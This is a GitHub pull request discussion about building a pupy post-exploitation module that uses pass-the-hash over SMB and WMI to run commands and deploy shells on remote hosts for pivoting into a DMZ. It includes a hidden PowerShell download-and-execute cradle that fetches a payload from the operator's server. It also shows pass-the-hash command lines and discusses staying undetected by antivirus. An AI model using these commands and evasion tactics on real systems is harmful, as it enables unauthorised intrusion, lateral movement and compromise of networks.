Smbmap module

AlessandroZ opened the pull request:
Hi, 

This module is under construction but I think it's a good start for pivoting into a DMZ. I commit it because I need help for a useful option that I want to add. 
Now, this module allows a user to list share and execute command on the remote host (using smb or wmi). 

- Example:

```
run smbmap -u <user> -H <hash> -x "whoami" <IP>
```

However, I would like to add another option (you could see it on the code, it's commented) to deploy a pupy shell from the remote host. I wanted to do that on powershell to not been detected by AV. So I needed to upload it on the remote session (using the upload function of pupy), then to upload the same script on the final target (using smb) and then executed it. All uploads worked well but the ps1 execution failed all the time. I tried lots of command lines but never worked (that's why I need help). 

I tried (just for test), to generate a ps1_oneliner but when I executed it, it failed again. Here is the output: 

```
run smbmap -u <user> -H <hash> -x "powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://my_ip:8080/p')\"" <IP>

GAC    Version        Location                                                 
---    -------        --------                                                 
True   v2.0.50727     C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__...
DLL received
The '=' operator failed: Exception of type 'System.OutOfMemoryException' was th
rown..
At line:30 char:6
+ $raw= <<<< AES-Decrypt $raw $p
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : OperatorFailed
 
out-lineoutput : The OS handle's position is not what FileStream expected. Do n
ot use a handle simultaneously in one FileStream and in Win32 code or another F
ileStream. This may cause data loss.
    + CategoryInfo          : NotSpecified: (:) [out-lineoutput], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Comma 
   nds.OutLineOutputCommand
```


_Note: I don't like the idea to download the ps1 (or exe) file from our host because it will always fail on a DMZ network (which could not access our host)._ 

Another idea would be to allow the user to specify a path to a local executable and it will be uploaded and executed. I don't want to generate it using pupy template, it will be trigger by all AV. 

If you have some idea, it would be very useful. 

Thanks

n1nj4sec commented:
I think there may be a problem with Invoke-ReflectivePEInjection.ps1 :/ The powershell process needs too much memory and it doesn't work on machines with lower RAM capacity.
I attempted to reduce the memory used by calling the powershell garbage collector (https://github.com/n1nj4sec/pupy/commit/be6c0e20d9004c6831d3bf183caa085d780782b1) but it's still not really effective and the powershell process always takes hundreds of MB or RAM and I don't understand where it comes from. It looks like byte buffers in powershell takes a lot more memory than the actual data they contain ...

AlessandroZ commented:
I have changed the module and renamed it. It works well. 

The session is well established. I don't know why, it freezes few seconds the server once the session is established f and get back to normal after. 

So now it's possible to upload a file and execute it on the remote server (not where we have a session but when we try the pass the hash). 
`run smbexec -u Administrateur -H aa...:aada <ip> -F <path>`

It could be useful for pivoting. 

Feel free to rename this module as you want, I didn't have many idea. I renamed it smbexec but it could launch wmi command as well.
